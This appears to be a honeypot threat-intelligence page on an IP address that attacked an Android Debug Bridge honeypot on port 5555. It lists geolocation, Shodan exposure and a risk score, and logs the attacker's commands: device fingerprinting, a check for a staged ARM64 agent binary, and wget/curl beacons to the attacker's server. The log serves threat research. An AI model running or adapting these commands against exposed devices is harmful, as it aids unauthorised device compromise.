Active Threat • LOW
31.7.58.138
🎯
100
Total Attacks
🔌
1
Ports
📡
1
Attack Types
🦠
0
Malware
Geolocation
- Country
- 🇨🇭 CH
- City
- Zurich
- ASN
- AS51852
- ISP
- Private Layer INC
Attack Types
adb_honeypot
Attacked Ports
5555
Associated Malware
No associated malware
Executed Commands
$
uname -m14x$
getprop ro.product.cpu.abi14x$
echo "===IDENT==="
id 2>/dev/null
hostname 2>/dev/null
echo "===PROPS==="
for k in ro.product.cpu.abi ro.product.cpu.abilist ro.product.cpu.abilist64 ro.product.cpu.abilist32 ro.product.model ro.product.manufacturer ro.product.brand ro.product.device ro.product.board ro.build.version.release ro.build.version.sdk ro.build.version.security_patch ro.build.fingerprint ro.build.type ro.hardware ro.boot.hardware ro.serialno; do
V=$(getprop $k 2>/dev/null)
[ -n "$V" ] && echo "$k=$V"
done
echo "===6x$
grep -E '^(CPU architecture|Processor|model name)' /proc/cpuinfo 2>/dev/null | head -34x$
ls /system/lib64/libc.so 2>/dev/null && echo L64 || echo L324x$
wc -c < /data/local/tmp/barco-agent-arm64 2>/dev/null2x$
wget -qO- 'http://31.7.58.138:8080/ping?id=15.235.184.72:5555' 2>/dev/null || /system/bin/curl -s 'http://31.7.58.138:8080/ping?id=15.235.184.72:5555' 2>/dev/null || curl -s 'http://31.7.58.138:8080/ping?id=15.235.184.72:5555' 2>/dev/null; echo __rc=$?1x$
wget -qO- 'http://31.7.58.138:8080/ping?id=51.178.49.206:5555' 2>/dev/null || /system/bin/curl -s 'http://31.7.58.138:8080/ping?id=51.178.49.206:5555' 2>/dev/null || curl -s 'http://31.7.58.138:8080/ping?id=51.178.49.206:5555' 2>/dev/null; echo __rc=$?1xShodan InternetDB ExposureShodan
InternetDB data, not real-time
Ports
80443300030015432808190909999
Hostnames
moonbet.unowww.wired4.infontp.digitalsuisse.comwired4.info
CPEs
cpe:/a:f5:nginxcpe:/a:postgresql:postgresql
Risk Assessment
30
/100
LowMediumHighCritical